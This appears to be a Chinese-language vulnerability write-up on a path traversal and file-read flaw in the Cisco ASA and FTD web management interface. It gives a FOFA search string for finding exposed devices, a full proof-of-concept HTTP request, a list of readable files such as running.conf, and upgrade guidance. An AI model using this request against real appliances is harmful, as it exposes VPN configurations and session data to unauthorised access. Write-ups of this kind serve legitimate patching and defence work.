漏洞描述
Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞,允许未经身份验证的远程攻击者进行目录遍历攻击并读取目标系统上的敏感文件,此漏洞不能用于获取对ASA或FTD系统文件或底层操作系统(OS)文件的访问,所以只能读取web系统目录的文件,比如webvpn的配置文件、书签、网络cookies、部分网络内容和超文本传输协议网址等信息。
漏洞影响版本
漏洞复现
FOFA搜索关键字:/+CSCOE+/
POC发包如下
GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: x.x.x.x
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: webvpnlogin=1; webvpnLang=en
可以读取以下文件
"sess_update.html"
"blank.html"
"noportal.html"
"portal_ce.html"
"portal.html"
"logon_custom.css"
"svc.html"
"logo.gif"
"portal_inc.lua"
"nostcaccess.html"
"session.js"
"portal.js"
"portal_custom.css"
"running.conf"
"tlbrportal_forms.js"
"logon_forms.js"
"win.js"
"portal.css"
"lced.html"
"pluginlib.js"
"useralert.html"
"ping.html"
"app_index.html"
"shshimdo_url"
"session_password.html"
"relayjar.html"
"relayocx.html"
"color_picker.js"
"color_picker.html"
"cedhelp.html"
"cedmain.html"
"cedlogon.html"
"cedportal.html"
"portal_elements.html"
"commonspawn.js"
"common.js"
"appstart.js"
"relaymonjar.html"
"relaymonocx.html"
"cedsave.html"
"tunnel_linux.jnlp"
"ask.html"
"no_svc.html"
"preview.html"
"cedf.html"
"ced.html"
"logon_redirect.html"
"logout.html"
"tunnel_mac.jnlp"
"gp-gip.html"
"auth.html"
"wrong_url.html"
"logon.html"
修复意见
Cisco ASA:
9.6 版本以前升级到某一修复版本
9.6 版本升级到 9.6.4.42 版本
9.7 版本升级到某一修复版本
9.8 版本升级到 9.8.4.20 版本
9.9 版本升级到 9.9.2.74 版本
9.10 版本升级到 9.10.1.42 版本
9.12 版本升级到 9.12.3.12 版本
9.13 版本升级到 9.13.1.10 版本
9.14 版本升级到 9.14.1.10 版本
Cisco FTD:
6.2.2 版本升级到某一修复版本
6.2.3 版本升级到 6.2.3.16 版本
6.3.0 版本升级到 6.3.0.5(Hot Fix)/6.3.0.6/6.4.0.9(Hot Fix)/6.6.0.1 版本
6.4.0 版本升级到 6.4.0.9(Hot Fix)/6.4.0.10 版本
6.5.0 版本升级到 6.5.0.4(Hot Fix)/6.5.0.5/6.6.0.1 版本
6.6.0 版本升级到 6.6.0.1 版本
Cisco FTD Hot Fix 细节:
6.3.0.5:
Cisco_FTD_Hotfix_AV-6.3.0.6-3.sh.REL.tar
Cisco_FTD_SSP_Hotfix_AV-6.3.0.6-3.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_AV-6.3.0.6-3.sh.REL.tar
6.4.0.9:
Cisco_FTD_Hotfix_BM-6.4.0.10-2.sh.REL.tar
Cisco_FTD_SSP_FP1K_Hotfix_BM-6.4.0.10-2.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_BM-6.4.0.10-2.sh.REL.tar
Cisco_FTD_SSP_Hotfix_BM-6.4.0.10-2.sh.REL.tar
6.5.0.4:
Cisco_FTD_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_FP1K_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_Hotfix_O-6.5.0.5-3.sh.REL.tar
要升级到Cisco FTD的修复版本,客户可以执行以下操作之一:
对于使用Cisco Firepower Management Center(FMC)的设备,请使用FMC界面安装升级。安装完成后,重新应用访问控制策略。
对于使用Cisco Firepower Device Manager (FDM)的设备,请使用FDM界面来安装升级。安装完成后,重新应用访问控制策略。